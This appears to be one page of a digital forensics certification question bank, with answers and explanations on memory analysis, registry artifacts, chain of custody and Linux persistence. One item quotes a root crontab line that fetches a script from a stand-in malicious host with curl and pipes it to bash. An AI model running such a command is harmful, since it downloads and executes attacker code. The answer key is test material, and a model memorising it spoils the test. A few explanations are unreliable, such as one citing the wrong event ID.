Frye focuses on general acceptance.

Why this answer

The Frye standard requires that scientific evidence be based on principles and methods that are generally accepted by the relevant scientific community.

426
MCQhard

An analyst retrieves a forensic image of a hard drive and discovers that the size reported by the operating system is smaller than the actual physical capacity. The extra space is not accessible through standard partition tools. This hidden area is MOST likely:

A.Device Configuration Overlay
B.Host Protected Area
C.Volume slack
D.RAM slack
AnswerB

HPA is a hidden area configured via ATA commands.

Why this answer

The Host Protected Area (HPA) is an area on the hard drive that is not accessible through standard ATA commands. It can be used to hide data.

427
MCQhard

During an investigation, an analyst uses the `volatility -f mem.dmp windows.pslist` command and observes a process named 'svchost.exe' with PID 1234. Further analysis shows that this process has no parent process (PPID = 0). What is the MOST likely explanation for this anomaly?

A.The process is a child of the System process (PID 4) but Volatility misreported it
B.The process belongs to a different session and Volatility failed to resolve the parent
C.The process is a legitimate system process that was started during boot
D.The process has been hidden using a rootkit that manipulated kernel objects (DKOM)
AnswerD

DKOM can alter the EPROCESS block to hide a process, often resulting in PPID=0.

Why this answer

In Windows, only the Idle process (PID 0) and System process (PID 4) typically have PPID 0. A user-mode process like svchost.exe with PPID 0 suggests the process list has been tampered with, often by rootkit techniques such as DKOM.

428
MCQmedium

A forensic analyst is examining an Android device that was factory reset before seizure. Which Google account artefacts are MOST likely still recoverable from the device's storage?

A.All installed application APK files
B.Full SMS message history
C.Google account authentication tokens and cached account data
D.Encryption keys for user data partition
AnswerC

Auth tokens and cached account info can persist in /data/system/ or unallocated space even after factory reset.

Why this answer

Factory reset on Android typically wipes user data partitions (e.g., /data) but does not securely overwrite the entire flash storage. Google account authentication tokens (e.g., OAuth 2.0 tokens) and cached account data (e.g., account names, sync settings) are often stored in system-level databases or encrypted key stores that may persist in unallocated or residual flash blocks, especially if TRIM or secure erase was not executed. These artefacts can be recovered via forensic imaging and carving of the raw NAND or eMMC.

Exam trap

EC-Council often tests the misconception that a factory reset securely erases all user data, when in reality residual artefacts like authentication tokens can persist in unallocated flash storage due to incomplete overwrite or lack of TRIM execution.

How to eliminate wrong answers

Option A is wrong because APK files are stored in the /data/app directory, which is part of the user data partition that is wiped during a factory reset; residual APK fragments are rarely recoverable in a complete, installable form. Option B is wrong because SMS messages are stored in the /data/data/com.android.providers.telephony/databases/mmssms.db file, which is also on the user data partition and is deleted during reset; while some fragments may remain in unallocated space, full message history is not reliably recoverable. Option D is wrong because encryption keys for the user data partition (e.g., FBE or FDE keys) are stored in the device's hardware-backed keystore or TEE and are cryptographically invalidated or wiped during factory reset, making them unrecoverable.

429
MCQeasy

Which of the following BEST describes the chain of custody in digital forensics?

A.The software tool used to image the hard drive.
B.A log of all personnel who have accessed the evidence, along with timestamps and reasons.
C.The process of encrypting evidence to prevent unauthorized access.
D.The physical lock and key used to secure the evidence locker.
AnswerB

This captures the essence of chain of custody.

Why this answer

Chain of custody is a documented record that tracks the seizure, custody, control, transfer, analysis, and disposition of evidence, ensuring its integrity and admissibility.

430
MCQmedium

A security analyst suspects malware infection on a Windows workstation. They run Process Monitor and observe that a process named 'svch0st.exe' creates a mutex named 'Global\Mutex_1234' and writes to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which malware persistence mechanism is being used?

A.Scheduled task creation
B.Service installation
C.DLL search order hijacking
D.Run key persistence
AnswerD

The Run registry key is a common persistence location for malware to launch on user logon.

Why this answer

The process 'svch0st.exe' writes to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run', which is a classic Run key used for automatic program execution at user logon. This is the most common malware persistence mechanism, as any executable referenced there will start each time the user logs in. The creation of a mutex named 'Global\Mutex_1234' is a common anti-reinfection technique to ensure only one instance of the malware runs, but the persistence is established via the Run key.

Exam trap

EC-Council often tests the distinction between user-level persistence (HKCU Run key) and system-level persistence (HKLM Run key or service installation), and candidates may confuse the 'Run' key with scheduled tasks or services because all three can launch executables at startup.

How to eliminate wrong answers

Option A is wrong because scheduled task creation uses the Task Scheduler service and writes to the '\Windows\System32\Tasks' directory or the 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache' registry key, not to the 'Run' key. Option B is wrong because service installation requires writing to 'HKLM\SYSTEM\CurrentControlSet\Services' and typically uses the 'CreateService' API, not the 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' key. Option C is wrong because DLL search order hijacking involves placing a malicious DLL in a directory searched before the legitimate DLL (e.g., the application's directory or the current working directory) and does not involve writing to a Run registry key or creating a mutex.

431
MCQmedium

A malware analyst runs a suspicious executable in Cuckoo Sandbox. The report shows that the process created a mutex named 'Global\MyMalwareMutex'. What is the significance of this mutex?

A.It is used to communicate with a remote command and control server
B.It prevents multiple instances of the malware from running simultaneously
C.It indicates the malware is packed with UPX
D.It stores encrypted configuration data
AnswerB

A mutex ensures only one instance of the malware runs to avoid conflicts.

Why this answer

The mutex named 'Global\MyMalwareMutex' is a named synchronization object used by the malware to ensure only one instance of its process runs at a time. This prevents conflicts in operations like file writing or network communication that could occur if multiple copies executed simultaneously. In Cuckoo Sandbox, detecting such a mutex is a common indicator of single-instance malware behavior.

Exam trap

EC-Council often tests the misconception that any named object with 'Global' implies network or cross-system communication, but in Windows, 'Global\' simply refers to the kernel object namespace accessible to all sessions on the same machine.

How to eliminate wrong answers

Option A is wrong because mutexes are local synchronization primitives within the Windows kernel, not network communication channels; C2 communication typically uses sockets, HTTP, or DNS. Option C is wrong because UPX packing is detected by analyzing the executable's section names (e.g., 'UPX0', 'UPX1') or entropy, not by mutex creation. Option D is wrong because mutexes do not store data; they are kernel objects with a name and state (signaled/non-signaled), whereas encrypted configuration is usually stored in files, registry keys, or memory.

432
Matchingmedium

Match each network protocol to its well-known port number (TCP/UDP).

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

21

23

161

389

3389

Why these pairings

These are standard port numbers assigned by IANA.

433
MCQmedium

During a forensic examination, an analyst uses Autopsy to view the contents of the Recycle Bin on a Windows 10 system. However, some files that were deleted by the user do not appear in the Recycle Bin. What is the MOST likely reason?

A.The Recycle Bin stores only files smaller than 1 GB
B.The files were encrypted
C.The files were deleted using Shift+Delete
D.The Recycle Bin was emptied
AnswerC

Shift+Delete bypasses Recycle Bin.

Why this answer

Files deleted using Shift+Delete bypass the Recycle Bin and are directly marked for deletion. Additionally, files deleted from command line or external drives may not go to Recycle Bin.

434
MCQmedium

In a Windows forensic investigation, the analyst wants to determine which USB devices were connected to the system, including the device serial number and first/last connection times. Which registry hive and key should be examined?

A.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B.NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C.HKLM\SAM\SAM\Domains\Account\Users
D.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
AnswerD

This key contains subkeys for each USB storage device with serial number and connection times.

Why this answer

USB device history is stored in the SYSTEM registry hive under USBSTOR, which records device class, serial number, and timestamps.

435
MCQmedium

During incident response, a first responder discovers a compromised system with signs of an active command-and-control (C2) connection. What is the MOST important immediate action to preserve evidence and prevent further damage?

A.Create a full disk image before taking any other action.
B.Disconnect the network cable to isolate the system from the network.
C.Immediately shut down the system to prevent further data exfiltration.
D.Run a full antivirus scan to remove the malware.
AnswerB

Disconnecting the network cable stops C2 communication, preserves volatile data, and allows for a controlled forensic acquisition.

Why this answer

Option B is correct because disconnecting the network cable immediately stops the active C2 communication, preventing further data exfiltration and command injection while preserving the current state of memory and disk. This action maintains the integrity of volatile evidence (e.g., network connections, running processes) and avoids the data loss that would occur with a shutdown or the evidence contamination that would result from running a scan.

Exam trap

EC-Council often tests the misconception that a full disk image is always the first priority, but in an active C2 scenario, network isolation must come first to prevent ongoing damage and preserve volatile evidence.

How to eliminate wrong answers

Option A is wrong because creating a full disk image before isolating the system allows the active C2 connection to continue exfiltrating data and potentially destroying evidence during the imaging process. Option C is wrong because immediately shutting down the system destroys volatile evidence (e.g., network connections, running processes, memory-resident malware) and may trigger anti-forensic mechanisms that wipe logs or encrypt data. Option D is wrong because running a full antivirus scan modifies the system state (e.g., file access times, registry keys) and may alert the attacker, causing them to terminate the C2 session or trigger a kill switch, thereby losing evidence of the active connection.

436
MCQmedium

During an investigation, an analyst recovers a file from unallocated space that contains fragments of a deleted document. The file size is 512 bytes, but the cluster size of the volume is 4096 bytes. What is the term for the unused bytes between the end of the file and the end of the last cluster?

A.Volume slack
B.Drive slack
C.File slack
D.RAM slack
AnswerC

Correct: File slack is the unused space in the last cluster after the file ends.

Why this answer

File slack is the space between the end of the logical file and the end of the last cluster allocated to it.

437
MCQhard

A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?

A.A user account was created for backupadmin on FS01
B.A service was installed under the backupadmin account
C.An explicit credential logon was performed to access FS01 using the backupadmin account
D.The backupadmin account locked out due to multiple failed attempts
AnswerC

4644 with explicit credential flag indicates RunAs or similar usage, and logon type 3 confirms network logon.

Why this answer

Event ID 4648 records when explicit credentials are used to logon, typically for RunAs or scheduled tasks. Logon type 3 indicates network logon. This means admin used backupadmin credentials to access FS01.

438
MCQhard

An analyst is investigating a Linux server that suffered a data breach. The attacker deleted several log files. The analyst runs `debugfs /dev/sda1` and issues the command `lsdel`. What is the purpose of this command in the context of file recovery?

A.List inodes of deleted files that still have allocated blocks
B.Recover deleted files from the journal
C.List all deleted directory entries in the journal
D.Display the current superblock information
AnswerA

Correct. lsdel shows inodes of deleted files with allocated blocks for potential recovery.

Why this answer

debugfs is a tool for ext2/3/4 filesystem debugging. The `lsdel` command lists inodes of deleted files that still have allocated blocks, enabling recovery.

439
MCQmedium

A first responder arrives at a suspected intrusion scene. A desktop computer is powered on and logged in. The user claims they saw suspicious files being copied to a USB drive. Which of the following should the first responder do FIRST?

A.Capture volatile data such as memory and running processes.
B.Power off the computer immediately to prevent further data loss.
C.Photograph the scene and document everything in a notebook.
D.Create a forensic image of the hard drive using a write blocker.
AnswerA

Volatile data (RAM, processes, network connections) is lost when power is removed, so it must be collected first.

Why this answer

The first priority is to preserve volatile data (e.g., memory, running processes) which may be lost if the system is powered off. Photographing the scene and documenting are important but come after securing volatile data.

440
Multi-Selectmedium

Which TWO tools are commonly used for file carving during a forensic investigation?

Select 2 answers
A.fdisk
B.Autopsy
C.LiME
D.Scalpel
E.Foremost
AnswersD, E

Why this answer

Foremost and Scalpel are dedicated file carving tools that recover files based on headers/footers. fdisk is a partition tool, Autopsy is a forensic suite that can use carving but is not primarily a carver, and LiME is for memory acquisition.

441
Matchingmedium

Match each forensic acquisition method to its description.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Collecting data from a running system

Collecting data from powered-off media

Copying only active files and metadata

Bit-for-bit copy of entire storage device

Collecting only fragments of unallocated space

Why these pairings

These methods differ in scope and when they are performed.

442
MCQhard

A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)

A.It saves a copy of the application's configuration
B.It logs all network connections made by the application
C.It records the application's execution count and last run time
D.The file contains the user's password for the application
AnswerC

Prefetch stores run count and timestamps.

Why this answer

Prefetch files contain the number of times the application was run, last run time, and a list of files loaded during execution. They do not store network connections or user-specific data.

443
MCQhard

In a RAID 5 array with three disks, one disk fails. The investigator images the remaining two disks and wants to reconstruct the missing data. Which approach is most appropriate?

A.Apply XOR operation between the two disk images to recover missing data
B.Mount the two disks in a Linux mdadm array with a missing disk
C.Use dd to concatenate the two disk images linearly
D.Use a tool like R-Studio to perform a virtual RAID rebuild
AnswerA

RAID 5 XOR parity can reconstruct missing data from remaining disks.

Why this answer

RAID 5 uses parity distributed across disks. Given two data disks, the third can be reconstructed by XORing the parity with the remaining data. However, the investigator must know the stripe size and parity layout.

444
MCQmedium

During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?

A.Persistence mechanism to maintain access
B.Log cleanup tool
C.System backup script
D.Software update process
AnswerA

Correct. This ensures the attacker's code runs repeatedly.

Why this answer

The cron job runs every 5 minutes as root, downloading and executing a script from a remote server. This is a typical persistence mechanism for a backdoor or command‑and‑control.

445
Multi-Selectmedium

Which TWO of the following are essential components of chain of custody documentation?

Select 2 answers
A.Every person who handled the evidence must sign and date the form
B.A detailed description of the evidence including make, model, and serial number
C.The forensic tool used to analyze the evidence
D.The evidence must be stored in a fireproof safe
E.The final analysis report
AnswersA, B

This documents the chain of custody.

Why this answer

Option A is correct because chain of custody documentation must record every individual who handled the evidence, along with their signature and the date/time of transfer, to establish an unbroken custody trail. This ensures the evidence's integrity and admissibility in court by demonstrating who had access at each stage.

Exam trap

EC-Council often tests the distinction between what belongs in chain of custody documentation versus what belongs in the forensic analysis report or security procedures, leading candidates to mistakenly include analysis tools or storage specifications.

446
MCQeasy

What is the PRIMARY purpose of a chain of custody document in a forensic investigation?

A.To provide a chronological record of who handled the evidence, when, and why.
B.To document the tools used during the investigation.
C.To list all the files found on the suspect's computer.
D.To authorize the search and seizure of digital evidence.
AnswerA

This establishes the integrity and continuity of evidence from collection to court.

Why this answer

The chain of custody document is the foundational record that ensures evidence integrity and admissibility in court. Its primary purpose is to create a chronological, unbroken log of every person who handled the evidence, the exact time and date of each transfer, and the reason for the transfer. This directly supports the legal requirement to prove that the evidence has not been tampered with or altered from the moment of seizure to its presentation in court.

Exam trap

EC-Council often tests the distinction between the chain of custody (which tracks handling history) and the search warrant (which grants legal authority), causing candidates to mistakenly choose the authorization option.

How to eliminate wrong answers

Option B is wrong because documenting the tools used during the investigation is a separate activity, typically recorded in a forensic workstation log or case notes, not in the chain of custody form. Option C is wrong because listing files found on a suspect's computer is the output of forensic analysis (e.g., a file listing from a tool like FTK Imager or EnCase), not the purpose of the chain of custody document. Option D is wrong because authorization for search and seizure is obtained via a legal warrant or consent form, not through the chain of custody; the chain of custody begins after the evidence has been legally seized.

447
Multi-Selectmedium

Which TWO Windows registry hives are most commonly analyzed during a forensic investigation to determine user activity and system configuration? (Select TWO.)

Select 2 answers
A.HKLM\SAM
B.HKU\.DEFAULT
C.HKLM\COMPONENTS
D.HKLM\BCD
E.HKCU\...\NTUSER.DAT
AnswersA, E

Contains user account information and password hashes.

Why this answer

SAM stores user account hashes, NTUSER.DAT contains user-specific settings, SYSTEM stores system configuration, SOFTWARE stores installed software info.

448
MCQmedium

During a forensic examination of a macOS system, an investigator wants to review application execution history. Which artifact contains a chronological record of application launches, including timestamps and process IDs?

A.FSEvents
B.com.apple.launchd.plist
C.syslog
D.Unified logging (log command)
AnswerD

Unified logging captures process lifecycle events via the 'log' command.

Why this answer

macOS unified logging provides detailed system activity including application launches. FSEvents records file system changes but not process launches. .plist files may store settings, not execution history.

449
MCQhard

An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?

A.Kernel rootkit
B.Web shell
C.SSH key backdoor
D.Cron-based persistence
AnswerD

Cron jobs execute at scheduled intervals, used for persistence.

Why this answer

Cron jobs are a common persistence mechanism on Linux. Attackers often use frequent cron jobs to maintain access.

450
MCQmedium

Which of the following email headers is used to verify the domain of the sending server and is commonly used for authentication to prevent spoofing?

A.Content-Type
B.Received
C.X-Mailer
D.DKIM-Signature
AnswerD

DKIM-Signature provides a digital signature for domain verification.

Why this answer

The DKIM-Signature header contains a cryptographic signature that allows the receiver to verify that the email was not modified and is from the claimed domain, helping prevent spoofing.

Page 5

Page 6 of 14

Page 7